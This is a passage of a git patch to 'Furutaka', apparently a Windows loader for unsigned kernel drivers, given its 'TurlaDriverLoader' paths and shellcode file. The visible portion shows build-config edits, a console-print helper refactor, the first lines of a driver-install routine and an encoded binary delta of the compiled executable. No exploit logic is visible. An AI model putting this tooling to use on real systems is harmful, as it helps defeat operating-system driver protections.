From 7e4aec975f9c7260b54604e9434cb7f63cfb5d18 Mon Sep 17 00:00:00 2001 From: hfiref0x Date: Mon, 17 Apr 2017 18:45:41 +0700 Subject: [PATCH] v 1.1.0 small update --- .gitattributes | 17 - Compiled/Furutaka.exe | Bin 97792 -> 97792 bytes README.md | 2 +- Source/Furutaka/Furutaka.sln | 2 +- Source/Furutaka/Furutaka.vcxproj | 81 +- Source/Furutaka/Furutaka.vcxproj.user | 8 - Source/Furutaka/cui.c | 113 ++- Source/Furutaka/cui.h | 31 +- Source/Furutaka/global.h | 6 +- Source/Furutaka/instdrv.c | 279 +++--- Source/Furutaka/instdrv.h | 49 +- Source/Furutaka/main.c | 1147 +++++++++++++------------ Source/Furutaka/resource.rc | Bin 4978 -> 5702 bytes Source/Furutaka/shellcode.h | 186 ++-- Source/Furutaka/sup.c | 534 ++++++------ Source/Furutaka/sup.h | 48 +- TDL.sha256 | 40 +- 17 files changed, 1248 insertions(+), 1295 deletions(-) delete mode 100644 .gitattributes diff --git a/.gitattributes b/.gitattributes deleted file mode 100644 index bdb0cab..0000000 --- a/.gitattributes +++ /dev/null @@ -1,17 +0,0 @@ -# Auto detect text files and perform LF normalization -* text=auto - -# Custom for Visual Studio -*.cs diff=csharp - -# Standard to msysgit -*.doc diff=astextplain -*.DOC diff=astextplain -*.docx diff=astextplain -*.DOCX diff=astextplain -*.dot diff=astextplain -*.DOT diff=astextplain -*.pdf diff=astextplain -*.PDF diff=astextplain -*.rtf diff=astextplain -*.RTF diff=astextplain diff --git a/Compiled/Furutaka.exe b/Compiled/Furutaka.exe index 0c6dfa369f1f6602475a2c4984fb0a6527581328..348832ed0a1045401158f57986483f541c339c24 100644 GIT binary patch delta 11370 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 delta 11281 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 - - Debug - Win32 - - - Release - Win32 - Debug x64 @@ -26,19 +18,6 @@ Furutaka - - Application - true - v140 - Unicode - - - Application - false - v140 - true - Unicode - Application true @@ -57,12 +36,6 @@ - - - - - - @@ -70,20 +43,10 @@ - - true - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ - true .\output\$(Platform)\$(Configuration)\ .\output\$(Platform)\$(Configuration)\ - - - false - .\output\$(Platform)\$(Configuration)\ - .\output\$(Platform)\$(Configuration)\ AllRules.ruleset @@ -93,23 +56,6 @@ NativeRecommendedRules.ruleset false - - - - - Level4 - Disabled - WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - CompileAsC - - - Console - true - TDLMain - RequireAdministrator - - @@ -124,30 +70,7 @@ Console true TDLMain - RequireAdministrator - - - - - Level4 - - - MaxSpeed - true - true - WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) - true - CompileAsC - true - - - Console - true - true - true - TDLMain - true - RequireAdministrator + AsInvoker @@ -164,6 +87,8 @@ true true false + Guard + MultiThreaded Console diff --git a/Source/Furutaka/Furutaka.vcxproj.user b/Source/Furutaka/Furutaka.vcxproj.user index 8f42863..b67d65e 100644 --- a/Source/Furutaka/Furutaka.vcxproj.user +++ b/Source/Furutaka/Furutaka.vcxproj.user @@ -4,14 +4,6 @@ C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys WindowsLocalDebugger - - C:\MAKEEXE\TurlaDriverLoader\Loader\drv\Tsugumi.sys - WindowsLocalDebugger - - - C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys - WindowsLocalDebugger - C:\MAKEEXE\TurlaDriverLoader\Loader\drv\TsugumiKernel.sys WindowsLocalDebugger diff --git a/Source/Furutaka/cui.c b/Source/Furutaka/cui.c index 39f6777..49d9770 100644 --- a/Source/Furutaka/cui.c +++ b/Source/Furutaka/cui.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: CUI.C * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 18 Jan 2016 +* DATE: 20 Mar 2017 * * Console output. * @@ -19,46 +19,95 @@ #include "global.h" /* -* cuiPrintText +* cuiPrintTextA * * Purpose: * * Output text to the console or file. * +* ANSI variant +* */ -VOID cuiPrintText( - _In_ HANDLE hOutConsole, - _In_ LPWSTR lpText, - _In_ BOOL ConsoleOutputEnabled, - _In_ BOOL UseReturn - ) +VOID cuiPrintTextA( + _In_ HANDLE hOutConsole, + _In_ LPSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn +) { - SIZE_T consoleIO; - DWORD bytesIO; - LPWSTR Buffer; + SIZE_T consoleIO; + DWORD bytesIO; + LPSTR Buffer; - if (lpText == NULL) - return; + if (lpText == NULL) + return; - consoleIO = _strlen(lpText); - if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) - return; + consoleIO = _strlen_a(lpText); + if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) + return; - consoleIO = consoleIO * sizeof(WCHAR) + 4 + sizeof(UNICODE_NULL); - Buffer = (LPWSTR)RtlAllocateHeap(RtlGetCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, consoleIO); - if (Buffer) { + consoleIO = (5 + consoleIO); + Buffer = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); + if (Buffer) { - _strcpy(Buffer, lpText); - if (UseReturn) _strcat(Buffer, TEXT("\r\n")); + _strcpy_a(Buffer, lpText); + if (UseReturn) _strcat_a(Buffer, "\r\n"); - consoleIO = _strlen(Buffer); + consoleIO = _strlen_a(Buffer); - if (ConsoleOutputEnabled == TRUE) { - WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); - } - else { - WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL); - } - RtlFreeHeap(RtlGetCurrentPeb()->ProcessHeap, 0, Buffer); - } + if (ConsoleOutputEnabled != FALSE) { + WriteConsoleA(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); + } + else { + WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(CHAR)), &bytesIO, NULL); + } + HeapFree(GetProcessHeap(), 0, Buffer); + } +} + +/* +* cuiPrintTextW +* +* Purpose: +* +* Output text to the console or file. +* +* UNICODE variant +* +*/ +VOID cuiPrintTextW( + _In_ HANDLE hOutConsole, + _In_ LPWSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn +) +{ + SIZE_T consoleIO; + DWORD bytesIO; + LPWSTR Buffer; + + if (lpText == NULL) + return; + + consoleIO = _strlen(lpText); + if ((consoleIO == 0) || (consoleIO > MAX_PATH * 4)) + return; + + consoleIO = (5 + consoleIO) * sizeof(WCHAR); + Buffer = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, consoleIO); + if (Buffer) { + + _strcpy(Buffer, lpText); + if (UseReturn) _strcat(Buffer, TEXT("\r\n")); + + consoleIO = _strlen(Buffer); + + if (ConsoleOutputEnabled != FALSE) { + WriteConsole(hOutConsole, Buffer, (DWORD)consoleIO, &bytesIO, NULL); + } + else { + WriteFile(hOutConsole, Buffer, (DWORD)(consoleIO * sizeof(WCHAR)), &bytesIO, NULL); + } + HeapFree(GetProcessHeap(), 0, Buffer); + } } diff --git a/Source/Furutaka/cui.h b/Source/Furutaka/cui.h index a2ded5f..3412d3a 100644 --- a/Source/Furutaka/cui.h +++ b/Source/Furutaka/cui.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: CUI.H * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 18 Jan 2016 +* DATE: 04 Feb 2017 * * Common header file for console ui. * @@ -18,11 +18,22 @@ *******************************************************************************/ #pragma once -#include "global.h" +VOID cuiPrintTextA( + _In_ HANDLE hOutConsole, + _In_ LPSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn +); -VOID cuiPrintText( - _In_ HANDLE hOutConsole, - _In_ LPWSTR lpText, - _In_ BOOL ConsoleOutputEnabled, - _In_ BOOL UseReturn - ); +VOID cuiPrintTextW( + _In_ HANDLE hOutConsole, + _In_ LPWSTR lpText, + _In_ BOOL ConsoleOutputEnabled, + _In_ BOOL UseReturn +); + +#ifdef UNICODE +#define cuiPrintText cuiPrintTextW +#else +#define cuiPrintText cuiPrintTextA +#endif diff --git a/Source/Furutaka/global.h b/Source/Furutaka/global.h index c6cf4d0..b15eb0d 100644 --- a/Source/Furutaka/global.h +++ b/Source/Furutaka/global.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: GLOBAL.H * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 01 Feb 2016 +* DATE: 17 Apr 2017 * * Common header file for the program support routines. * diff --git a/Source/Furutaka/instdrv.c b/Source/Furutaka/instdrv.c index 5d53482..16c29bb 100644 --- a/Source/Furutaka/instdrv.c +++ b/Source/Furutaka/instdrv.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015 - 2016, portions (C) Mark Russinovich, FileMon +* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon * * TITLE: INSTDRV.C * -* VERSION: 1.11 +* VERSION: 1.10 * -* DATE: 01 Feb 2016 +* DATE: 17 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -25,33 +25,33 @@ * */ BOOL scmInstallDriver( - _In_ 